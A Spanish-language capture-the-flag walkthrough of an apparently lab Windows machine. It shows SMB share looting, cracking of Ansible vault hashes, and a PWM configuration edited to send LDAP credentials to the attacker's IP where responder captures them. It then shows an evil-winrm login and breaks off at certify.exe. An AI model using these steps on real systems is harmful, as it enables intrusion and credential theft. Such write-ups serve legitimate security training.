Hacemos el escaneo de nmap:
Comenzamos con la enumeración de SMB por el puerto 445, donde nos encontramos con dos recursos compartidos que pueden ser interesantes, por lo que revisamos el recurso de Department Shares y no hay nada interesante:
Pero si miramos el otro recurso compartido de Development, sí que encontramos cosas, donde corre un servicio de Ansible:
smbclient -N //10.10.11.222/Development/
Nos descargamos todo el recurso compartido de Ansible para poder analizarlo con más detalle:
smbclient -N //10.10.11.222/Development/ -c "recurse; prompt; mget *"
Y dentro del directorio /Automation/Ansible/PWM/ansible_inventory nos encontramos con unas credenciales de ansible:
administrator:Welcome1
Y dentro de esta otra ruta nos encontramos con unos hashes de ansible dentro del fichero main.yml:
/Automation/Ansible/PWM/defaults/main.yml
Y también tenemos unas credenciales de tomcat:
admin:T0mc@tAdm1n robot:T0mc@tR00t
Comenzamos con el cracking de los hashes de ansible, donde vamos a copiar cada uno de ellos con la siguiente estructura:
Ahora extraemos el hash de cada uno de estos archivos para crackearlo con john the ripper:
Aplicamos el cracking y obtenemos las siguientes credenciales, donde vemos la misma contraseña:
!@#$%^&*
Ya podremos desencriptar cada uno de los hashes de ansible con la herramienta ansible-vault, la cual debemos de instalarla con pip previamente: pip install ansible-vault
svc_pwm pWm_@dm!N_!23 DevT3st@123
Accedemos al puerto 8443, donde si intentamos iniciar sesión nos sale el siguiente error de directorio:
Hacemos clic en configuration editor:
Y nos pide una contraseña, la cual si probamos con las que hemos crackeado anteriormente, esta sería la correcta:
pWm_@dm!N_!23
Hacemos clic en cancel y nos encontramos con esta web:
Nos bajamos el fichero de configuración:
Dentro de este archivo debemos de localizar la siguiente línea, que es donde se autentica el servidor ldap:
Y la reemplazamos por esta otra, poniendo nuestra IP y un puerto:
<value>ldap://10.10.16.7:389</value>
Y subimos la nueva configuración al servidor:
Una vez hecho esto, podemos ponernos en escucha con el responder y habremos capturado el hash del usuario svc_ldap:
responder -I tun0
Estas son las credenciales:
svc_ldap:lDaP_1n_th3_cle4r!
Y con evil-winrm podemos autenticarnos:
evil-winrm -i 10.10.11.222 -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
Dentro de la raíz del servidor nos encontramos con un directorio interesante, el cual se llama Certs:
Hay una herramienta para detectar si un certificado es vulnerable, la cual se llama certify.exe:






















